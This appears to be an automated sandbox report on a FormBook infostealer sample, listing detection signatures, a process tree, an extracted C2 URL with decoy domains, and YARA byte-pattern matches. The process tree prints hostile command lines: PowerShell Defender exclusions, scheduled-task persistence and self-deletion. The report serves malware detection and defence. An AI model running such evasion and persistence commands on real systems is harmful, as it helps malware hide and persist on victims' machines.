Edit tour

Windows Analysis Report
CZyOWoN2hiszA6d.exe

Overview

General Information

Sample name:	CZyOWoN2hiszA6d.exe
Analysis ID:	1487821
MD5:	4f9709aa08fb342403b4a9d952419184
SHA1:	07913a57cfe7e1674525397f571ae98d3195a11c
SHA256:	1b9e77854e399411406c1f8e3fa6e0bceb4a1284c7bedeed503bcb24bdcfbe30
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: CMSTP Execution Process Creation

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses a Windows Living Off The Land Binaries (LOL bins)

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

CZyOWoN2hiszA6d.exe (PID: 1076 cmdline: "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe" MD5: 4F9709AA08FB342403B4A9D952419184)

powershell.exe (PID: 4368 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7352 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 3332 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp4BD3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

CZyOWoN2hiszA6d.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe" MD5: 4F9709AA08FB342403B4A9D952419184)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

cmstp.exe (PID: 7532 cmdline: "C:\Windows\SysWOW64\cmstp.exe" MD5: D7AABFAB5BEFD53BA3A27BD48F3CC675)

cmd.exe (PID: 7676 cmdline: /c del "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dacYzRiJuWECy.exe (PID: 7300 cmdline: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe MD5: 4F9709AA08FB342403B4A9D952419184)

schtasks.exe (PID: 7564 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp620B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dacYzRiJuWECy.exe (PID: 7612 cmdline: "C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe" MD5: 4F9709AA08FB342403B4A9D952419184)

mstsc.exe (PID: 7856 cmdline: "C:\Windows\SysWOW64\mstsc.exe" MD5: EA4A02BE14C405327EEBA8D9AD2BD42C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.gtur.top/v15n/"], "decoy": ["dyahwoahjuk.store", "toysstorm.com", "y7rak9.com", "2222233p6.shop", "betbox2341.com", "visualvarta.com", "nijssenadventures.com", "main-12.site", "leng4d.net", "kurainu.xyz", "hatesa.xyz", "culturamosaica.com", "supermallify.store", "gigboard.app", "rxforgive.com", "ameliestones.com", "kapalwin.live", "tier.credit", "sobol-ksa.com", "faredeal.online", "226b.xyz", "talktohannaford500.shop", "mxrkpkngishbdss.xyz", "mirotcg.info", "turbo3club.site", "hjnd28t010cop.cyou", "marveloustep.shop", "syedlatief.com", "comfortableleather.com", "alltradescortland.com", "dnwgt80508yoec8pzq.top", "kedai168ef.com", "gelgoodlife.com", "nxtskey.com", "milliedevine.store", "wordcraftart.fun", "mpo525.monster", "bt365851.com", "dogeversetoken.net", "boostgrowmode.com", "dacapital.net", "project21il.com", "go4stores.com", "brunoduarte.online", "sexgodmasterclass.com", "wuhey.shop", "jdginl892e.xyz", "agenkilat-official.space", "hacks.digital", "suv.xyz", "fwbsmg.life", "vicmvm649n.top", "wbahdfw.icu", "creativelyloud.com", "merrycleanteam.com", "solar-systems-panels-58747.bond", "rotaryclubofmukono.com", "bethanyumcnola.info", "breezafan.com", "ny-robotictoys.com", "lawyers-br-pt-9390663.fyi", "neurasaudi.com", "dgccb.com", "sayuri-walk.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b8271:$a1: 3C 30 50 4F 53 54 74 09 40 0x2e6691:$a1: 3C 30 50 4F 53 54 74 09 40 0x313ab1:$a1: 3C 30 50 4F 53 54 74 09 40 0x2cebe0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2fd000:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x32a420:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2bc9df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x2eadff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x31821f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x2c78c7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x2f5ce7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x323107:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x2bb928:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2bbb92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2e9d48:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2e9fb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x317168:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3173d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2c76c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2f5ae5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x322f05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2c71b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2f55d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3229f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2c77c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2f5be7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x323007:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2c793f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2f5d5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x32317f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2bc5aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x2ea9ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x317dea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x2ca869:$sqlite3step: 68 34 1C 7B E1 0x2ca97c:$sqlite3step: 68 34 1C 7B E1 0x2f8c89:$sqlite3step: 68 34 1C 7B E1 0x2f8d9c:$sqlite3step: 68 34 1C 7B E1 0x3260a9:$sqlite3step: 68 34 1C 7B E1 0x3261bc:$sqlite3step: 68 34 1C 7B E1 0x2ca898:$sqlite3text: 68 38 2A 90 C5 0x2ca9bd:$sqlite3text: 68 38 2A 90 C5 0x2f8cb8:$sqlite3text: 68 38 2A 90 C5 0x2f8ddd:$sqlite3text: 68 38 2A 90 C5 0x3260d8:$sqlite3text: 68 38 2A 90 C5 0x3261fd:$sqlite3text: 68 38 2A 90 C5 0x2ca8ab:$sqlite3blob: 68 53 D8 7F 8C 0x2ca9d3:$sqlite3blob: 68 53 D8 7F 8C 0x2f8ccb:$sqlite3blob: 68 53 D8 7F 8C 0x2f8df3:$sqlite3blob: 68 53 D8 7F 8C 0x3260eb:$sqlite3blob: 68 53 D8 7F 8C 0x326213:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.4489782694.0000000010A4E000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xaf2:$a2: pass 0xaf8:$a3: email 0xaff:$a4: login 0xb06:$a5: signin 0xb17:$a6: persistent 0xcea:$r1: C:\Users\user\AppData\Roaming\98545SBT\985log.ini
Process Memory Space: CZyOWoN2hiszA6d.exe PID: 1076	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: CZyOWoN2hiszA6d.exe PID: 1076	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x27ee7:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: CZyOWoN2hiszA6d.exe PID: 7256	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1ebd:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: dacYzRiJuWECy.exe PID: 7300	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: cmstp.exe PID: 7532	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x243f:$a1: 3C 30 50 4F 53 54 74 09 40 0x71407:$a1: 3C 30 50 4F 53 54 74 09 40 0x177f43:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: mstsc.exe PID: 7856	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xd4a0a:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 32 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.CZyOWoN2hiszA6d.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.CZyOWoN2hiszA6d.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
9.2.CZyOWoN2hiszA6d.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
9.2.CZyOWoN2hiszA6d.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.CZyOWoN2hiszA6d.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
9.2.CZyOWoN2hiszA6d.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.CZyOWoN2hiszA6d.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
9.2.CZyOWoN2hiszA6d.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
